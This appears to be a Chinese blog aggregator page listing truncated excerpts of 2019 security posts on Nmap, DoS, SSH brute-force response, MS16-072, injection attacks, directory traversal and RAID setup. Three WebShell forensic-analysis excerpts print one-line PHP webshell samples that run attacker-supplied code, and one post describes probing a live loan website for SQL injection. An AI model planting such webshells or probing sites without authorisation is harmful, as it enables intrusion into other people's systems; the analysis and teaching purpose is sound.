0

Nmap渗透测试使用方法

常见软件NMAP的基本攻击防御手段,包含以下内容:目标选择, 端口选择, 操作系统和服务检测, Nmap输出格式, 用NSE脚本深入挖掘, HTTP服务信息, 检测SSL漏洞问题的主机等等 ...

斑林鸽的代码世界 发布于 2019-10-30 19:31 评论(0)阅读(237)
4

【网络安全】Dos攻击科普文

[TOC] DOS攻击 什么是DOS攻击 DOS是Denial of Service的简称,用中文简单翻译就是拒绝服务。DOS攻击的目的是:通过耗尽服务器的CPU、内存和网络带宽等资源使服务器无法为用户提供正常服务或使得服务质量下降。总结下就是 攻击服务器,使得服务器拒绝为正常的用户请求提供服务。( ...

写代码的木公 发布于 2019-10-30 17:30 评论(1)阅读(307)
0

SSH爆破应急响应

问题发现 登录云主机,根据提示消息,发现正遭受SSH爆破攻击,IP地址为159.65.230.189 查看登录相关安全日志:tail -f /var/log/secure,发现其他尝试爆破IP106.12.183.6、182.61.166.179、220.88.40.41 百度搜索IP地址为国外IP ...

noofi 发布于 2019-10-30 16:40 评论(0)阅读(41)
0

MS16-072域内中间人攻击

0x01 漏洞利用 在目标主机域用户口令已知的条件下,目标主机在进行策略更新时,对域服务器的认证存在漏洞,攻击者劫持认证服务器的过程,引导至伪造的域服务器,并在域服务器中制定用户的计划任务策略,可以获取该主机的最高控制权限。 在域服务器离线时,域内主机使用域用户登录后,策略更新时,认证域服务器时存在 ...

痱子﹑ 发布于 2019-10-30 15:57 评论(0)阅读(50)
0

WebShell代码分析溯源(三)

WebShell代码分析溯源(三) 一、一句话变形马样本 <?php $g = array('','s');$gg = a.$g[1].ser.chr('116');@$gg($_POST[get]);?> 二、代码分析 1、调整代码格式 2、分析代码 分析代码,首先创建一个g数组,然后拼接字符串, ...

雨中落叶 发布于 2019-10-30 13:54 评论(0)阅读(35)
0

WebShell代码分析溯源(二)

WebShell代码分析溯源(二) 一、一句话变形马样本 <?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> 二、代码分析 1、调整代码格式 2、分析代码,首先先把”assert”字符串 ...

雨中落叶 发布于 2019-10-30 12:35 评论(0)阅读(32)
4

【网络安全】SQL注入、XML注入、JSON注入和CRLF注入科普文

[TOC] SQL注入 所谓SQL注入,是将恶意SQL命令通过某种方式提交到服务器后台,并欺骗服务器执行这些恶意的SQL命令的一种攻击方式。 —— [ 百度百科 ] 造成SQL注入漏洞原因有两个:一个是没有对输入的数据进行过滤(过滤输入),还有一个是没有对发送到数据库的数据进行转义(转义输出)。 一 ...

写代码的木公 发布于 2019-10-29 20:19 评论(1)阅读(598)
0

WebShell代码分析溯源(一)

WebShell代码分析溯源(一) 一、一句话变形马样本 <?php $_GET['POST']($_POST['GET']);?> 二、代码分析 1、调整代码格式 <?php $_GET['POST']($_POST['GET']); ?> 2、分析代码,首先以GET方法接收url中POST参数传 ...

雨中落叶 发布于 2019-10-29 14:10 评论(0)阅读(77)
0

物联网防火墙himqtt源码之MQTT协议分析

物联网防火墙himqtt源码之MQTT协议分析 himqtt是首款完整源码的高性能MQTT物联网防火墙 - MQTT Application FireWall,C语言编写,采用epoll模式支持数十万的高并发连接,并且兼容ModSecurity部分规则。 代码非常优秀,非常值得收藏和学习,今天笔者就 ...

hihttps 发布于 2019-10-29 13:21 评论(0)阅读(59)
0

以太网帧前导码、帧间隙

http://www.360doc.com/content/19/1005/22/30927740_865043870.shtml ...

撒欢 发布于 2019-10-29 12:49 评论(0)阅读(41)
0

HTTP协议

首先,了解一下协议。 协议是指计算机通信网络中两台计算机之间进行通信所必须共同遵守的规定或规则,超文本传输协议(HTTP)是一种通信协议,它允许将超文本标记语言(HTML)文档从web服务器传送到客户端的浏览器。 HTTP协议,即超文本传输协议(Hypertext transfer protocol ...

MrHH 发布于 2019-10-28 17:00 评论(0)阅读(27)
0

利用关联网络,防控信用卡“养卡套现”

信用卡是最常见金融信贷产品,初衷是为了解决用户提前消费和便捷支付的需求。发卡机构根据申请人的信用资质授予其可以使用的信用额度,申请人可以在多个消费场景使用信用卡额度进行便捷的信用支付,而已经使用的额度可以在还款之后重新恢复、再循环使用于更多的消费支付场景。 套现养卡,信用卡常见的违规操作 由于信用卡 ...

X安全 发布于 2019-10-28 15:41 评论(0)阅读(30)
0

肖哥HCNP-学前准备篇笔记

HCNA:助理 HCNP:工程师 HCIE:专家 vmvare workstation 1.安装 2.创建新的虚拟机 典型 稍后安装系统 选择系统模式 选择位置(大一点的磁盘空间.) 磁盘空间 自定义硬件 网卡选择桥接 光盘里加载镜像 其他自己定义 开启虚拟机 安装操作系统 做快照 先关机 右键快照 ...

生如逆旅 发布于 2019-10-26 22:51 评论(0)阅读(39)
0

安全分析,无意间的渗透

l 今天又是一天安全划水分析的日子,无意间打开发现一个贷款网页,心生念想,想测试看看有什么东西,嘿嘿。 l 安全圈ID:空 城 l 以下技术很垃圾,欢迎各位大佬指点我 l 随后我们随便点开一个贷款平台,发现如下网页 l 因为我个人喜欢SQL注入,并发现其URL后存在ID=10字段,立马提交单引号(’ ...

空 城 发布于 2019-10-26 00:43 评论(0)阅读(55)
0

RAID5的创建(5块磁盘,三块做raid,两块做备份)

RAID5的创建(5块磁盘,三块做raid,两块做备份) 第一步:参考我的上一篇博客,用同样的方法添加5块硬盘。地址如下: https://www.cnblogs.com/Feng-L/p/11735091.html 第二步:查看磁盘信息 第二步:创建RAID5,并设置两块备份故障盘 第三步:查看一 ...

Feng-L 发布于 2019-10-24 22:04 评论(0)阅读(74)
0

RAID10(5块硬盘)的简介和创建

一、 RAID10简介 (1)兼具速度和安全性,但成本很高。 (2)继承了RAID0的快速与RAID1的安全,RAID1在这里提供了冗余备份的阵列,而RAID0则负责数据的读写阵列。因这种结构的成本高,一般用于存放要求速度与差错控制的数据。 二、RAID5在虚拟机CentOS 7环境下的创建 第一步 ...

Feng-L 发布于 2019-10-24 21:33 评论(0)阅读(118)
0

[转载]目录遍历攻击解析

文章来源:https://cloud.tencent.com/developer/news/60212 参考文章:https://www.cnblogs.com/AtesetEnginner/p/11064279.html 一.漏洞描述 目录遍历是由于web服务器或者web应用程序对用户输入的文件名 ...

lowezheng 发布于 2019-10-24 10:55 评论(0)阅读(97)
0

recon-ng打开后显示No modules enabled/installed

今天开始学习使用 recon ng,进去后发现这么一行: <! more 原因 在网上找了挺久,发现了这篇文章: "Recon ng v5 Tutorial" , 原来是更新的原因,需要我们自行安装模块(旧版本是自带了许多模块)。 以下主要是参考该文,并结合自己使用的总结: 输入help,发现这两个 ...

小friend 发布于 2019-10-23 20:09 评论(0)阅读(254)
0

Docker安全扫描工具之Anchore

本篇简单介绍一款Docker安全扫描工具Anchore的安装和使用。 ...

starnight_cyber 发布于 2019-10-22 15:32 评论(0)阅读(172)
0

web漏洞-命令执行、文件上传、XSS

一、命令执行 1:什么是命令执行? 命令执行漏洞是指攻击者可以随意执行系统命令。属于高危漏洞之一任何脚本语言都可以调用操作系统命令。 应用有时需要调用一些执行系统命令的函数,举个例子如:PHP中的system、exec、shell_exec、passthru、popen、proc_popen等,当用 ...

一颗小豆子 发布于 2019-10-21 22:09 评论(0)阅读(64)